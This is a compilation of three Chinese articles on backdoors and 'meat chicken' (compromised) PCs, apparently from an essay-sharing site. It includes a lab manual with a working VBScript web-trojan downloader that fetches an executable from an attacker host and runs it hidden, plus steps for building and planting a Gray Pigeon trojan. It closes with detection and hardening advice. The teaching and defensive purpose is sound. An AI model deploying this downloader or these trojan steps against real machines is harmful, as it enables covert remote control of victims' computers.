篇一:网络后门和网页木马
实验三 网络后门和网页木马
【实验目的】
理解后门的定义与分类;掌握后门的操作与原理;剖析网页木马的工作原理;理解木马的植入过程;学会编写简单的网页木马脚本;通过分析监控信息实现手动
删除木马。
【实验人数】
每组2人
【系统环境】
Windows
【网络环境】
交换网络结构
【实验工具】
灰鸽子木马;监控器工具;JlcssShell;网络协议分析器
【实验原理】
最早的后门是由系统开发人员为自己留下入口而安装的,而今天,并非开发人员将后门装入自己设计的程序中,而是大多数攻击者将后门装入他人开发和维护的系统中。通过使用这样的后门,攻击者可以很轻松地获得系统的访问权,进而获得系统的控制权。为了更加明确,我们给出后门的以下定义: 后门是一个允许攻击者绕过系统中常规安全控制机制的程序,它按照攻击者自己的意愿提供通道。
后门的作用在于为攻击者进入目标计算机提供通道。这个通道可能表现为不同形式,它取决于攻击者的目的和所使用的特定后门类型。后门能够为攻击者提供许多种不同类型的访问,包括以下几种:
本地权限的提升:这类后门使得对系统有访问权的攻击者突然变换其权限等级成为管理员,有了这些超级用户权限,攻击者可以重新设置系统或访问任何存储在系统中的文件。
单个命令的远程执行:利用这种类型的后门,攻击者可以向目标计算机发送消息。每次执行一个单独的命令,后门执行攻击者的命令并将其输出返回给攻击者。
远程命令行解释器访问:正如我们所知的远程shell命令,这种类型的后门允许攻
击者通过网络快递直接地键入受害计算机的命令提示。攻击者可以利用命令行解释器的所有特征,包括执行一个命令集合的能力编写脚本,选择一些文件进行操作。远程shell比简单的单命令远程执行要强大得多,因为它们可以模拟攻击者对目标计算机的键盘有直接访问权的情形。
远程控制GUI(Remote Control of the GUI):比将命令行解释器弄混乱更甚,有些后门可以让攻击者看到目标计算机的GUI,控制鼠标的移动,输入对键盘的操作,这些都是通过网络实现的。有了对GUI的远程控制,攻击者可以看到受害者对计算机的所有操作,甚至远程控制GUI。
无论后门提供何种类型的访问,我们都会发现这些方法的重点在于控制。后门使得攻击者控制计算机,这一切通常是通过网络远程实现的。有了装入目标计算机的后门,攻击者可以利用这种控制搜索计算机中的易感染文件,改变存储在系统中的任何数据,改装计算机,甚至使系统瘫痪。利用后门,攻击者可以像受害者计算机本身的管理员一样对其进行同样的控制。更有甚者,攻击者可以通过Internet在世界的任何地方实现该控制。
网页木马就是一个由黑客精心制作的含有木马的HTML网页,因为MS06014漏洞存在,当用户浏览这个网页时就被在后台自动安装了木马的安装程序。所以黑客会千方百计的诱惑或者欺骗人们去打开他所制作的网页,进而达到植入木马的目的。不过随着人们网络安全意识的提高,这种方法已经很难欺骗大家了。
还有一种方法就是通过<iframe>标签,在一个正常网站的主页上链接网页木马。浏览者在浏览正常的网站主页时,iframe语句就会链接到含有木马的网页,网页木马就被悄悄植入了。这种方法就是大家经常说的“挂马”,而中了木马的主机通常被幽默的称作“肉鸡”。“挂马”因为需要获取网站管理员的权限,所以难度很大。不过他的危害也是十分巨大的,如果黑客获得了一个每天流量上万的知名网站的管理员权限并成功“挂马”,那试想他会有多少“肉鸡”。以下是挂马操作。
<html>
<script language="VBScript">
<!-- 首先动态创建对象组件,并声明组件的clsid -->
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
<!-- 创建XMLHTTP对象,用来完成从数据包到Request对象的转换以及发送任务 -->
Set xh = df.createObject("Microsoft.XMLHTTP","")
<!-- 创建Adodb.Stream对象,提供存取二进制数据或文本流,实现对流的读、写等操作 -->
Set ados = df.createObject("Adodb.Stream","")
ados.type = 1
<!-- 使用HTTP GET初始化HTTP请求 -->
url = "http://主机IP地址:9090/Server_Setup.exe"
xh.Open "GET", url, False
<!-- 发送HTTP请求,并获取HTTP响应 -->
xh.Send
<!-- 创建Scripting.FileSystem对象,提供对计算机文件系统进行访问 -->
Set fs = df.createObject("Scripting.FileSystemObject","")
<!-- 获取目标路径,0为windows目录;1为system目录;2为用户临时目录 -->
Set tmpdir = fs.GetSpecialFolder(2)
<!-- 向目标路径后添加文件名称winlogin.exe,此名称与系统文件名相似,不易被察觉 -->
fname1="winlogin.exe"
fname1= fs.BuildPath(tmpdir,fname1)
<!-- 打开Adodb.Stream对象,将服务器返回的响应数据写入对象,将对象内容保存至目标文件--> ados.Open
ados.Write xh.responseBody
ados.SaveToFile fname1,2
<!-- 文件系统操作完成,关闭对象 -->
ados.Close
<!-- 创建Shell对象,调用执行目标文件 -->
Set sl = df.createObject("Shell.Application","")
<!-- 以隐藏方式运行木马 -->
sl.ShellExecute fname1,"","","open",0
</script>
</html>
【实验步骤】
网络后门
1. 系统自带远程控制工具(3389远程控制)
(1)设置远程登录用户。
主机B依次单击“我的电脑”|“属性”|“远程”|“远程桌面”,选中“启用这台计算机上的远程桌面”。
单击“选择远程用户”按钮,进入远程桌面用户,单击“添加”按钮,添加远程用户帐户,在选择用户对话框中点选“高级”|“立即查找”,在查找结果中选择一个已存在的用户,按确定,完成用户添加工作。
(2)将用户名,密码告知同组主机A,并由其对本机进行远程登录。
主机A依次单击“开始”|“程序”|“附件”|“通讯”|“远程桌面连接”,启动远程桌面连接工具,在计算机一栏填写同组主机B的IP地址,单击“连接”按钮进行连接。在出现的登录界面中填入同组主机B提供的用户名和密码以图形界面登录到同组主机。利用远程连接,在同组主机上进行文件操作,注意不要随便删除连接主机上的文件。
2. 远程控制工具JlcssShell
(1)主机B首先在控制台中执行netstat -an,查看本机开启的端口情况。单击实验平台工具栏中“JlcssShell”按钮,进入JlcssShell工作目录,运行JlcssShell.exe,再次查看本机开启端口的情况,端口21581是否开启 。
(2)主机A确认JlcssShell后门植入主机B后,用“telnet”命令对主机B连接并实现部分功能的控制。主机A打开命令行操作界面,输入“telnet 主机B的IP地址 21581”,其中“21581”为JlcssShell后门程序的执行端口。然后输入“连接密码”:jlcssok。 确认后即可进入远程控制界面。输入“?”键入“回车”,获取帮助菜单。
「注」 帮助菜单中q操作不但能够退出当前远程连接操作,而且可以卸载远程shell后门。因此在执行了q操作后,需要重新运行程序,启动后门。
(3)主机A对主机B进行简单的磁盘操作。
3.后门通信分析
根据协议分析器对捕获数据的会话分析结果,回答下列问题:
(1)后门客户程序进行网络主机后门探测时,其发送的最初网络数据的协议类型是__________,通过该协议可以达到什么目标__________。
(2)若探测的目标主机存在(不一定存在后门),后门客户程序接下来发送的网络数据IP上层协议类型是__________、上层协议负载长度__________(字节)、最后6个字节文本内容是__________。
(3)受害主机对后门客户程序发出的后门探测命令的响应数据内容是__________、IP上层协议类型是__________。
(4)后门客户程序发出枚举受害主机运行进程的命令是__________。
(5)通过命令netstat -nap tcp(或udp)查看服务端口,对比运行贪吃蛇程序后系统监听端口是否有变化?
4. 防御无端口后门
应对ICMP无端口后门的最有效的方法就是在主机上设置ICMP数据包的处理规则,请尝试启用实验系统自带的Windows防火墙,阻止后门通信。 极端的方法就是拒绝所有的ICMP数据包。
网页木马
木马生成与植入
在进行本实验步骤之前,我们再来阐述一下用户主机通过访问被“挂马”的网站而被植入木马的过程,便于同学们理解和完成实验。
(1)用户访问被“挂马”的网站主页。(此网站是安全的)
(2)“挂马”网站主页中的<iframe>代码链接一个网址(即一个网页木马),使用户主机自动访问网页木马。(通过把<iframe>设置成不可见的,使用户无法察觉到这个过程)
(3)网页木马在得到用户连接后,自动发送安装程序给用户。
(4)如果用户主机存在MS06014漏洞,则自动下载木马安装程序并在后台运行。
(5)木马安装成功后,木马服务端定时监测控制端是否存在,发现控制端上线后立即弹出端口主动连接控制端打开的被动端口。
(6)客户端收到连接请求,建立连接。
1. 生成网页木马
(1)主机A首先通过Internet信息服务(IIS)管理器启动“木马网站”。
(2)主机A进入实验平台在工具栏中单击“灰鸽子”按钮运行灰鸽子远程监控木马程序。
(3)主机A生成木马的“服务器程序”。
主机A单击木马操作界面工具栏“配置服务程序”按钮,弹出“服务器配置”对话框,单击“自动上线设置”属性页,在“IP通知http访问地址、DNS解析域名或固定IP”文本框中输入本机IP地址,在“保存路径”文本框中输入“D:\Work\IIS\Server_Setup.exe”,单击“生成服务器”按钮,生成木马“服务器程序”。
(4)主机A编写生成网页木马的脚本。
在桌面建立一个“Trojan.txt”文档,打开“Trojan.txt”,将实验原理中网马脚本写入,并将第15行“主机IP地址”替换成主机A的IP地址。把“Trojan.txt”文件扩展名改为“.htm”,生成“Trojan.htm”。
篇二:肉鸡
肉鸡
肉鸡一种是餐桌上的,这种鸡不下蛋,专供肉食。二是网络上的菜鸟,被抓来利用的(黑客常用词),就是被黑客攻破,种植了木马病毒的电脑,也可以说是具有最高管理权限的远程电脑。简单的说就是受你控制的远程电脑。黑客可以随意操纵它并利用它做任何事情,就象傀儡。肉鸡可以是各种系统,如windows、linux、unix等,更可以是一家公司、企业、学校甚至是政府军队的服务器。 要登陆肉鸡,必须知道3个参数:远程电脑的IP、用户名、密码。
所谓电脑肉鸡,就是拥有管理权限的远程电脑,也就是受黑客远程控制的电脑。
说到肉鸡,就要讲到远程控制。远程控制软件例如灰鸽子、上兴等。肉鸡不是吃的那种,是中了木马,或者留了后门,可以被远程操控的机器,许多人把有WEBSHELL 权限的机器也叫肉鸡。
谁都不希望自己的电脑被他人远程控制,但是很多人的电脑是几乎不设防的,很容易被远程攻击者完全控制。你的电脑就因此成为别人砧板上的肉,别人想怎么吃就怎么吃,肉鸡(机)一名由此而来。
及时发现
注意以下几种基本的情况:
1:QQ、MSN的异常登录提醒 (系统提示上一次的登录IP不符)
2:网络游戏登录时发现装备丢失或与上次下线时的位置不符,甚至用正确的密码无法登录。
3:有时会突然发现你的鼠标不听使唤,在你不动鼠标的时候,鼠标也会移动,并且还会点击有关按钮进行操作。
4:正常上网时,突然感觉很慢,硬盘灯在闪烁,就像你平时在COPY文件。
5:当你准备使用摄像头时,系统提示,该设备正在使用中。
6:在你没有使用网络资源时,你发现网卡灯在不停闪烁。如果你设定为连接后显示状态,你还会发现屏幕右下角的网卡图标在闪。
7:服务列队中出可疑程服务。
8:宽带连接的用户在硬件打开后未连接时收到不正常数据包。(可能有程序后台连接) 9:防火墙失去对一些端口的控制。
10:上网过程中计算机重启。
11:有些程序如杀毒软件防火墙卸载时出现闪屏(卸载界面一闪而过,然后报告完成。) 12:一些用户信任并经常使用的程序(QQ`杀毒)卸载后。目录文仍然存在,删除后自动生成。
13:电脑运行过程中或者开机的时候弹出莫名其妙的对话框
以上现象,基本是主观感觉,并不十分准确,但需要提醒您注意。
14:还可以通过CMD下输入 NETSTAT -AN 查看是否有可疑端口等
接下来,可以借助一些软件来观察网络活动情况,以检查系统是否被入侵。
1.注意检查防火墙软件的工作状态
比如金山网镖。在网络状态页,会显示当前正在活动的网络连接,仔细查看相关连接。如果发现自己根本没有使用的软件在连接到远程计算机,就要小心了。
2.推荐使用tcpview,可以非常清晰的查看当前网络的活动状态。
一般的木马连接,是可以通过这个工具查看到结果的。
这里说一般的木马连接,是区别于某些精心构造的rootkit木马采用更高明的隐藏技术,不易被发现的情况。
3.使用金山清理专家进行在线诊断,特别注意全面诊断的进程项
清理专家会对每一项进行安全评估,当遇到未知项时,需要特别小心。
4.清理专家百宝箱的进程管理器
可以查找可疑文件,帮你简单的检查危险程序所在。[1]
如何避免
1.关闭高危端口
第一步,点击“开始”菜单/设置/控制面板/管理工具,双击打开“本地安全策略”,选中“IP 安全策略,在本地计算机”,在右边窗格的空白位置右击鼠标,弹出快捷菜单,选择“创建 IP 安全策略”,于是弹出一个向导。在向导中点击“下一步”按钮,为新的安全策略命名;再按“下一步”,则显示“安全通信请求”画面,在画面上把“激活默认相应规则”左边的钩去掉,点击“完成”按钮就创建了一个新的IP 安全策略。
第二步,右击该IP安全策略,在“属性”对话框中,把“使用添加向导”左边的钩去掉,然后单击“添加”按钮添加新的规则,随后弹出“新规则属性”对话框,在画面上点击“添加”按钮,弹出IP筛选器列表窗口;在列表中,首先把“使用添加向导”左边的钩去掉,然后再点击右边的“添加”按钮添加新的筛选器。
第三步,进入“筛选器属性”对话框,首先看到的是寻址,源地址选“任何 IP 地址”,目标地址选“我的 IP 地址”;点击“协议”选项卡,在“选择协议类型”的下拉列表中选择“TCP”,然后在“到此端口”下的文本框中输入“135”,点击“确定”按钮(如左图),这样就添加了一个屏蔽 TCP 135(RPC)端口的筛选器,它可以防止外界通过135端口连上你的电脑。
点击“确定”后回到筛选器列表的对话框,可以看到已经添加了一条策略,重复以上步骤继续添加 TCP 137、139、445、593 端口和 UDP 135、139、445 端口,为它们建立相应的筛选器。
重复以上步骤添加TCP1025、2745、3127、6129、3389端口的屏蔽策略,建立好上述端口的筛选器,最后点击“确定”按钮。
第四步,在“新规则属性”对话框中,选择“新 IP筛选器列表”,然后点击其左边的
圆圈上加一个点,表示已经激活,最后点击“筛选器操作”选项卡。在“筛选器操作”选项卡中,把“使用添加向导”左边的钩去掉,点击“添加”按钮,添加“阻止”操作(右图):然后点击“确定”按钮。
第五步,进入“新规则属性”对话框,点击“新筛选器操作”,
其左边的圆圈会加了一个点,表示已经激活,点击“关闭”按钮,关闭对话框;最后回到“新IP安全策略属性”对话框,在“新的IP筛选器列表”左边打钩,按“确定”按钮关闭对话框。在“本地安全策略”窗口,用鼠标右击新添加的 IP 安全策略,然后选择“指派”。
重新启动后,电脑中上述网络端口就被关闭了,病毒和黑客再也不能连上这些端口,从而保护了你的电脑。
2.及时打补丁
肉鸡捕猎者一般都是用“灰鸽子”病毒操控你的电脑,建议用灰鸽子专杀软件杀除病毒。
3.经常检查系统
经常检查自己计算机上的杀毒软件,防火墙的目录,服务,注册表等相关项。
黑客经常利用用户对它们的信任将木马隐藏或植入这些程序。
警惕出现在这些目录里的系统属性的DLL。(可能被用来DLL劫持)
警惕出现在磁盘根的pagefile.sys.(该文件本是虚拟页面交换文件。也可被用来隐藏文件。要检查系统的页面文件的盘符是否和它们对应)
4.盗版系统存在风险
如果你的操作系统是其它技术人员安装,或者有可能是盗版XP,比如电脑装机商的**版本,蕃茄花园XP,雨木林风XP,龙卷风XP等。这样的系统,很多是无人值守安装的。安装步骤非常简单,你把光盘放进电脑,出去喝茶,回来就可能发现系统已经安装完毕。
这样的系统,最大的缺陷在哪儿呢?再明白不过,这种系统的管理员口令是空的,并且自动登录。也就是说,任何人都可以尝试用空口令登录你的系统,距离对于互联网来说,根
本不是障碍。
5.移动存储设备
在互联网发展起来之前,病毒的传播是依赖于软磁盘的,其后让位于网络。公众越来越频繁的使用移动存储设备(移动硬盘、U盘、数码存储卡)传递文件, 这些移动存储设备成为木马传播的重要通道。计算机用户通常把这样的病毒称为U盘病毒或AUTO病毒。意思是插入U盘这个动作,就能让病毒从一个U盘传播到 另一台电脑。
6.安全上网
成为肉鸡很重要的原因之一是浏览不安全的网站,区分什么网站安全,什么网站不安全,这对普通用户来说,是很困难的。并且还存在原来正常的网站被入侵植入木马的可能性,也有被ARP攻击之后,访问任何网页都下载木马的风险。
上网下载木马的机会总是有的,谁都无法避免,只能减轻这种风险。
浏览器的安全性需要得到特别关注,浏览器和浏览器插件的漏洞是黑客们的最爱,flash player漏洞就是插件漏洞,这种漏洞是跨浏览器平台的,任何使用flash player的场合都可能存在这种风险。
如何自救
正在上网的用户,发现异常应首先马上断开连接
如果你发现IE经常询问是你是否运行某些ActiveX控件,或是生成莫名其妙的文件、询问调试脚本什么的,一定要警惕了,你可能已经中招了。典型的上网被入侵有两种情况:
一是浏览某些带恶意代码的网页时候被修改了浏览器的默认主页或是标题,这算是轻的;还有就是遇到可以格式化硬盘或是令你的Windows不断打开窗口,直到耗尽资源死机——这种情况恶劣得多,你未保存和已经放在硬盘上的数据都可能会受到部分或全部的损失。
二是潜在的木马发作,或是蠕虫类病毒发作,让你的机器不断地向外界发送你的隐私,
篇三:木马肉鸡自动上线过程分析
木马肉鸡自动上线过程分析
通过架设FTP服务器,更新自己的IP地址到FTP服务器上,这样就可以将自己的IP地址告诉目标机器,IP就相当于一个指针,目标机器只要一上线就会通知电脑我已经上线了,每一次更新完IP之后就要配置服务程序,就是简单的后门程序,只要在目标机器上一运行就可以进行控制,但是值得注意得是,进行验证的时候必须将防火墙关闭,否则防火墙会报警,这是因为灰鸽子的特征码太明显,很容易就会引起防火墙的注意。所以验证的时候应该及时关闭防火墙。
当然如果不用FTP更新的方式也可以做,动态的IP也可以实现(方法可以在网上找相关教程),但是可能要做相关的端口映射和DNS解析。
如果通过外网来进行实验的话效果明显,但是要是外网和内网进行实验的话,需要做相关的端口的映射,由于条件的限制,只能通过学校的机器进行简单的验证。
这是学校电子阅览室的两台计算机,通过在其中一台机器上运行后门成功地对其进行控制
《后门病毒电脑肉鸡》
由:免费论文网互联网用户整理提供,链接地址:
http://m.csmayi.cn/meiwen/32483.html
转载请保留,谢谢!
- 上一篇:易地扶贫搬迁规划
- 下一篇:大学班情分析